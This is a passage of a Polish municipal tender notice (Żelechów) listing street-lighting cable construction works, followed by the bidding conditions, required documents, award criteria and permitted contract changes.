31. Demontaż słupów żelbetowych linii NN pojedynczych z ustojami P-10 - 3 szt.
32. Demontaż słupów żelbetowych linii NN rozkracznych - 2 szt.
33. Demontaż osprzętu sieciowego i konstrukcji metalowych linii NN - trzon kabłąkowy
z izolatorem na słupie stojącym - 15 szt.
34. Demontaż opraw oświetlenia zewnętrznego na trzpieniu słupa lub wysięgniku - 5 kpl.
35. Demontaż wysięgników rurowych o ciężarze do 30 kg mocowanych na słupie
lub ścianie - 5 szt.
18.2. Budowa linii kablowej oświetlenia - obwód 1
36. Kopanie rowów dla kabli w sposób ręczny w gruncie kat. III - 55.720 m3.
37. Nasypanie warstwy piasku na dnie rowu kablowego o szerokości do 0.4 m - 199 m.
38. Ułożenie rur osłonowych z PCW o śr. do 140 mm - rura DVK 75 - 30 m.
39. Układanie kabli o masie do 3.0 kg/m w rurach, pustakach lub kanałach zamkniętych - 30 m.
40. Układanie kabli o masie do 3.0 kg/m w rowach kablowych ręcznie - 169 m.
41. Zasypywanie rowów dla kabli wykonanych ręcznie w gruncie kat. III - 39.8 m3
42. Wykopy pionowe ręczne dla urządzenia przeciskowego wraz z jego zasypaniem
w gruncie nienawodnionym kat. III-IV - 1.320 m3.
43. Przewierty mechaniczne dla rury o śr. do 125 mm pod obiektami - 15 m.
44. Układanie kabli o masie do 3.0 kg/m w rurach, pustakach lub kanałach zamkniętych - 15 m.
45. Montaż przewodów do opraw oświetleniowych - wciąganie w słupy i rury osłonowe
- linia kablowa zasilająca - 14 kpl.
46. Montaż przewodów do opraw oświetleniowych - wciąganie w słupy, rury osłonowe
i wysięgniki przy wysokości latarń do 10 m - przewody do opraw - 16 kpl.
47. Zarobienie na sucho końca kabla 5-żyłowego o przekroju żył do 50 mm2 na
napięcie do 1 kV o izolacji i powłoce z tworzyw sztucznych - 14 szt.
48. Podłączenie przewodów pojedynczych o przekroju żyły do 50 mm2 pod zaciski
lub bolce - 64 szt. żył.
49. Podłączenie przewodów pojedynczych o przekroju żyły do 2.5 mm2 pod zaciski
lub bolce - 96 szt. żył.
50. Badanie linii kablowej N.N.- kabel 4-żyłowy - 7 odc.
51. Zabezpieczenie podziemnej części słupów - fundamentu - 20 m2.
52. Montaż i stawianie słupów oświetleniowych o masie do 300 kg - 8 szt.
53. Montaż wysięgników rurowych o masie do 15 kg na słupie - 8 szt.
54. Montaż opraw oświetlenia zewnętrznego na wysięgniku - 16 szt.
55. Tablica bezpiecznikowa wnękowa - 8 szt.
18.3. Budowa linii kablowej oświetlenia - obwód 2
56. Kopanie rowów dla kabli w sposób ręczny w gruncie kat. III - 55.440 m3.
57. Nasypanie warstwy piasku na dnie rowu kablowego o szerokości do 0.4 m - 198 m.
58. Ułożenie rur osłonowych z PCW o śr. do 140 mm - rura DVK 75 - 54 m.
59. Układanie kabli o masie do 3.0 kg/m w rurach, pustakach lub kanałach zamkniętych - 54 m.
60. Układanie kabli o masie do 3.0 kg/m w rowach kablowych ręcznie - 144 m.
61. Zasypywanie rowów dla kabli wykonanych ręcznie w gruncie kat. III - 39.600 m3.
62. Wykopy pionowe ręczne dla urządzenia przeciskowego wraz z jego zasypaniem
w gruncie nienawodnionym kat. III-IV - 1.320 m3.
63. Przewierty mechaniczne dla rury o śr. do 125 mm pod obiektami - 24 m.
64. Układanie kabli o masie do 3.0 kg/m w rurach, pustakach lub kanałach zamkniętych - 24 m.
65. Montaż przewodów do opraw oświetleniowych - wciąganie w słupy i rury osłonowe
- linia kablowa zasilająca - 15 kpl.
66. Montaż przewodów do opraw oświetleniowych - wciąganie w słupy, rury osłonowe
i wysięgniki przy wysokości latarń do 10 m - przewody do opraw - 16 kpl.
67. Zarobienie na sucho końca kabla 5-żyłowego o przekroju żył do 50 mm2 na
napięcie do 1 kV o izolacji i powłoce z tworzyw sztucznych - 16 szt.
68. Podłączenie przewodów pojedynczych o przekroju żyły do 50 mm2 pod zaciski
lub bolce - 60 szt. żył.
69. Podłączenie przewodów pojedynczych o przekroju żyły do 2.5 mm2 pod zaciski
lub bolce - 96 szt. żył.
70. Badanie linii kablowej N.N.- kabel 4-żyłowy - 8 odc.
71. Zabezpieczenie podziemnej części słupów - fundamentu - 20 m2.
72. Montaż i stawianie słupów oświetleniowych o masie do 300 kg - 8 szt.
73. Montaż wysięgników rurowych o masie do 15 kg na słupie - 8 szt.
74. Montaż opraw oświetlenia zewnętrznego na wysięgniku - 16 szt.
75. Tablica bezpiecznikowa wnękowa - 8 szt.
76. Układanie kabli o masie do 3.0 kg/m przez wciąganie do rur osłonowych mocowanych
na słupach betonowych - 4 m.
77. Montaż mostków rozłącznych (przekrój przewodów do 70 mm2) dla linii niskiego
napięcia -połączenie z istniejącą linią - 4 szt.
18.4. Budowa linii kablowej oświetlenia - połączenia obwodów nr 1 i nr 2
78. Kopanie rowów dla kabli w sposób ręczny w gruncie kat. III - 14 m3.
79. Nasypanie warstwy piasku na dnie rowu kablowego o szerokości do 0.4 m - 50 m.
80. Ułożenie rur osłonowych z PCW o śr. do 140 mm - rura DVK 75 - 8 m.
81. Układanie kabli o masie do 3.0 kg/m w rurach, pustakach lub kanałach zamkniętych - 8 m.
82. Układanie kabli o masie do 3.0 kg/m w rowach kablowych ręcznie - 42 m.
83. Zasypywanie rowów dla kabli wykonanych ręcznie w gruncie kat. III - 10 m3.
84. Wykopy pionowe ręczne dla urządzenia przeciskowego wraz z jego zasypaniem
w gruncie nienawodnionym kat. I II-IV - 1.320 m3.
85. Przewierty mechaniczne dla rury o śr. do 125 mm pod obiektami - 10 m.
86. Układanie kabli o masie do 3.0 kg/m w rurach, pustakach lub kanałach zamkniętych - 10 m.
87. Montaż przewodów do opraw oświetleniowych - wciąganie w słupy i rury osłonowe
- linia kablowa zasilająca - 4 kpl.
88. Zarobienie na sucho końca kabla 5-żyłowego o przekroju żył do 50 mm2 na
napięcie do 1 kV o izolacji i powłoce z tworzyw sztucznych - 4 szt.
89. Podłączenie przewodów pojedynczych o przekroju żyły do 50 mm2 pod zaciski
lub bolce - analogia zabezpieczenie i zaizolowanie końcówek kabli - 16 szt. żył.
90. Badanie linii kablowej N.N.- kabel 4-żyłowy - 2 odc.
18.5. Podłączenie linii wykonywanej wg opracowania PGE do projektowanych słupów
91. Ułożenie rur osłonowych z PCW o śr.do 140 mm - rura DVK 75 - 1 m.
92. Układanie kabli o masie do 3.0 kg/m w rurach, pustakach lub kanałach zamkniętych - 1 m.
93. Montaż przewodów do opraw oświetleniowych - wciąganie w słupy i rury osłonowe
- linia kablowa zasilająca - 2 kpl.
94. Zarobienie na sucho końca kabla 5-żyłowego o przekroju żył do 50 mm2 na
napięcie do 1 kV o izolacji i powłoce z tworzyw sztucznych - 2 szt.
95. Podłączenie przewodów pojedynczych o przekroju żyły do 50 mm2 pod zaciski
lub bolce - 8 szt. żył.
96. Badanie linii kablowej N.N.- kabel 4-żyłowy - 2 odc.
18.6. Koszty dodatkowe
97. Wszelkie koszty związane z obsługą geodezyjną (wytyczenie i inwentaryzacja),
zajęcie terenu, wszystkie koszty niezbędne do wykonania zadania inwestycyjnego
zgodnie z projektem - 1 kpl. 

Wszystkie materiały użyte do wykonania sieci muszą posiadać aktualne polskie aprobaty techniczne lub odpowiadać Polskiej i Europejskiej Normie. Roboty muszą być prowadzone zgodnie z obowiązującymi przepisami oraz muszą spełniać wymogi techniczne opisane w specyfikacji technicznej. 

Szczegółowy opis przedmiotu zamówienia i zakres robót zawiera dokumentacja projektowa oraz przedmiar stanowiące załączniki do SIWZ. 
Wykonawca zobowiązany jest zapewnić wykonanie i kierowanie robotami objętymi umową
i niniejszą specyfikacją przez osoby posiadające stosowne kwalifikacje zawodowe i uprawnienia budowlane.
Dopuszcza się zastosowanie materiałów równoważnych w stosunku do podanych w projekcie 
i przedmiarach.
Wskazanie w dokumentacji projektowej i ST nazwy handlowej lub marki wraz z ich rozwiązaniami technicznymi należy rozumieć jako określenie standardu przedmiotu zamówienia i dopuszcza się do zastosowania w ofercie wszelkich ich odpowiedników rynkowych. Wskazanie marki i eksploatacyjne cechy techniczne lub nazwy handlowe określają klasę produktu (materiałów, urządzeń itp.) a nie jego producenta. Zaoferowane przez wykonawcę maszyny, materiały i urządzenia równoważne nie mogą zmienić założeń technologicznych.
1. Przed złożenie oferty Zamawiający zaleca dokonanie wizji lokalnej w terenie. Po dokonaniu wizji lokalnej i stwierdzeniu zaistnienia ewentualnych niezgodności przedmiaru robót z pozostałymi częściami dokumentacji projektowej, oczywistych pomyłek lub pominięcia niektórych robót, Wykonawca ma obowiązek zgłosić do Zamawiającego wniosek o wyjaśnienie w trybie art. 38 ustawy - Prawo Zamówień Publicznych. Nie wniesienie zastrzeżeń w w/w zakresie skutkuje obowiązkiem wykonania przez wykonawcę robót zgodnie z dokumentacją techniczną i wiedzą techniczne, zgodnie z art. 647 K.C. Całość robót należy wycenić zgodnie z projektem budowlanym, specyfikacją techniczną wykonania i i odbioru robót, przedmiarem robót. 
2. Zamawiający informuje, że za wykonanie przedmiotu zamówienia określonego w niniejszej specyfikacji, ustala się cenę ryczałtową. W  związku z powyższym cena oferty musi zawierać wszelkie koszty niezbędne do zrealizowania zamówienia wynikające wprost z dokumentacji projektowej, specyfikacji technicznej i SIWZ, jak również w nich nie ujęte, a bez których nie można wykonać zamówienia. 
3. Przedmiar robót (kosztorys ślepy) należy traktować jako materiał pomocniczy dla ustalenia ceny ryczałtowej zamówienia. Cena całkowita będzie traktowana jako cena ryczałtowa, a przedłożony kosztorys ofertowy będzie miał jedynie znaczenie pomocnicze i informacyjne w celu uwiarygodnienia ceny, dlatego pominięcie pozycji lub dodanie nowej pozycji nie wpłynie na prawidłowość sporządzenia kosztorysu.
4. Wykonawca musi przewidzieć wszystkie okoliczności, które mogą wpłynąć na cenę zamówienia, w związku z tym zaleca się również sprawdzenie w terenie warunków wykonania zamówienia.
5. Wybrany Wykonawca  zobowiązany jest do odpowiedniego oznakowania terenu, na którym odbywać się będą roboty oraz pełnego zabezpieczenia materiałów i sprzętu do wykonywania robót.
6. Wykonawca odpowiada za wszelkie zanieczyszczenia i szkody spowodowane przez prowadzenie robót na istniejących sieciach..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy robót budowlanych, zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, zgodnego z przedmiotem zamówienia podstawowego. W przypadku, gdy wykonywanie niniejszej umowy będzie się wiązało z wykonywaniem umowy z zakresu zamówień uzupełniających, Zamawiający przedłuży termin wykonania robót budowlanych na podstawie aneksu wyznaczając czas niezbędny do wykonania zamówienia z uwzględnieniem czasu potrzebnego na wykonanie umowy z zakresu zamówienia uzupełniającego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.23.32.52-0, 45.31.00.00-3, 45.23.24.60-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.04.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca pod rygorem ważności oferty wnosi wadium na całość przedmiotu zamówienia
w kwocie 60.000,00 zł, na konto przedstawione na stronie tytułowej s.i.w.z. do upływu terminu składania ofert i dołącza do oferty oryginał lub poświadczoną kopię dokumentu stwierdzającego wniesienie wadium. 
2. Wadium może być wnoszone w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r.
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.). (art.45 ust.6 ustawy).
3. Wadium zostanie zwrócone wszystkim oferentom na zasadach określonych w art. 46 ustawy.
4. Zamawiający zatrzymuje wadium wraz z odsetkami w przypadkach określonych w art.46 ust.5 ustawy.
5. Wykonawcy którzy nie wnieśli wadium, w tym również na przedłużony okres związania z ofertą zostaną wykluczeni z postępowania (art.24 ust.2 pkt.2 ustawy).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie przedłożonego oświadczenia (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony po przedstawieniu wykazu wykonanych w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zawierającego wykonanie minimum 1 roboty polegającej na rozbudowie, przebudowie, remoncie lub modernizacji obiektu zabytkowego o wartości min. 2.000.000,00 zł brutto z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.  - wypełniony wg wzoru załącznik nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie przedłożonego oświadczenia (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże iż dysponuje następującymi osobami:
- Kierownik robót inżynieryjno-drogowych - uprawnienia budowlane w specjalności inżynieryjnej drogowej do kierowania robotami bez ograniczeń (zgodnie z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie, Dz. U. 2014, poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów, potwierdzone zaświadczeniem o wpisie, w drodze decyzji, do centralnego rejestru osób posiadających uprawnienia budowlane, prowadzonego przez Głównego Inspektora Nadzoru Budowlanego oraz wpis na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę izbę, z określonym w nim terminem ważności - minimum 1 osoba,
- Kierownik robót konstrukcyjno-budowlanych - uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do kierowania robotami bez ograniczeń (zgodnie z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie, Dz. U. 2014, poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów, potwierdzone zaświadczeniem o wpisie, w drodze decyzji, do centralnego rejestru osób posiadających uprawnienia budowlane, prowadzonego przez Głównego Inspektora Nadzoru Budowlanego oraz wpis na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę izbę, z określonym w nim terminem ważności - minimum 1 osoba,
- Kierownik robót branży sanitarnej - uprawnienia budowlane w specjalności instalacyjnej w zakresie w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do kierowania robotami bez ograniczeń (zgodnie z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie, Dz. U. 2014, poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów, potwierdzone zaświadczeniem o wpisie, w drodze decyzji, do centralnego rejestru osób posiadających uprawnienia budowlane, prowadzonego przez Głównego Inspektora Nadzoru Budowlanego oraz wpis na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę izbę, z określonym w nim terminem ważności - minimum 1 osoba, 
- Kierownik robót branży elektrycznej - uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych do kierowania robotami bez ograniczeń (zgodnie z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie, Dz. U. 2014, poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów, potwierdzone zaświadczeniem o wpisie, w drodze decyzji, do centralnego rejestru osób posiadających uprawnienia budowlane, prowadzonego przez Głównego Inspektora Nadzoru Budowlanego oraz wpis na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę izbę, z określonym w nim terminem ważności - minimum 1 osoba,
UWAGA: Zamawiający dopuszcza wskazanie jednej osoby do pełnienia dwóch lub więcej funkcji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w przypadku, gdy wykonawca wykaże, iż posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 2.000.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca złoży ofertę według wzoru który jest załącznik nr 1 do SIWZ, Kosztorys ofertowy, który ma na celu uwiarygodnienie ceny, Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji (liczony w miesiącach) - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- zmiany stosowanych przez Wykonawcę materiałów i urządzeń, na inne, o parametrach nie gorszych niż zaoferowane przez Wykonawcę w ofercie i spełniających wymagania zawarte w SIWZ i niniejszej umowie - w sytuacji wycofania materiałów i urządzeń z produkcji przez producenta, bez zmiany wartości umowy;
- zmiany terminu realizacji umowy i/lub wartości umowy w sytuacji, gdy Wykonawca w trakcie realizacji robót ustali uzasadnione błędy lub braki w dokumentacji projektowej, które uniemożliwią wykonanie przedmiotu umowy w ustalonym w umowie terminie i/lub koszcie;
- Zmiany technologiczne, w szczególności konieczność zrealizowania robót przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w opisie przedmiotu zamówienia, podyktowane zapewnieniem prawidłowego wykonania robót budowlanych, zastosowaniem innych rozwiązań technicznych lub technologicznych niż wskazane w opisie przedmiotu zamówienia, w szczególności bardziej optymalnych lub nowoczesnych oraz w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem robót. Zmiany te nie mogą powodować zwiększenia całkowitego wynagrodzenia Wykonawcy, mogą być natomiast powiązane z obniżeniem wynagrodzenia na zasadach określonych przez strony,
- Zmiany w zakresie realizacji umowy przy udziale podwykonawców, w sytuacji, gdy Wykonawca wskazał, jak również i nie wskazał w ofercie, iż realizację zamówienia powierzy podwykonawcom. Zmiany w tym zakresie nastąpić mogą z uwagi na okoliczności uzasadniające zmianę dotyczącą zapewnienia prawidłowej realizacji umowy,
- Kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami - w takim przypadku zmiany w Umowie zostaną ograniczone do zmian koniecznych, powodujących uniknięcie kolizji,
- Zmiany stawki podatku VAT, na podstawie aktualnie obowiązujących przepisów w tym zakresie. W takim przypadku zmianie ulegnie wyłącznie cena brutto umowy,
- Obniżenia ceny w stosunku do ceny ofertowej przez Wykonawcę.
- Zmiany danych Stron (np. zmiana siedziby, adresu, nazwy).
- Działania siły wyższej lub wystąpienia stanu wyższej konieczności.
- Omyłek pisarskich lub błędów rachunkowych.
- Mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami.
- Zmian sposobu płatności wynagrodzenia.
- Zmiany wynagrodzenia. 
- Zmiany w zakresie terminu realizacji w przypadku niemożności prowadzenia robót budowlanych z przyczyn niezależnych od Wykonawcy, a uznanych na piśmie przez Zamawiającego, termin zakończenia umowy może zostać zmieniony przez strony z uwzględnieniem czasu trwania przyczyny. Za takie przyczyny uważać będzie się w szczególności: warunki atmosferyczne, siła wyższa, awarie, katastrofy, akty wandalizmu, zmiany dokumentacji, dokonywanej na wniosek Zamawiającego lub Wykonawcy, wystąpienia zamówienia uzupełniającego, z tym jednak zastrzeżeniem, iż Wykonawca nie będzie uprawniony do żadnego przedłużenia terminu wykonania umowy, jeżeli opóźnienie to jest spowodowane przez jakikolwiek błąd lub opóźnienie ze strony Wykonawcy.
- Zmiany w przypadku konieczności wykonania robót zamiennych. Powyższa zamiana musi uzyskać akceptację Zamawiającego i jest możliwa tylko wówczas, gdy konieczność wykonania prac zamiennych wynika z niemożności wykonania prac przewidzianych w dokumentacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zelechow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Żelechowie, ul. Marszałka Józefa Piłsudskiego 47, 08-430 Żelechów pok. nr 9, od pon. do pt. w godz. 8.30-15.30..</p>
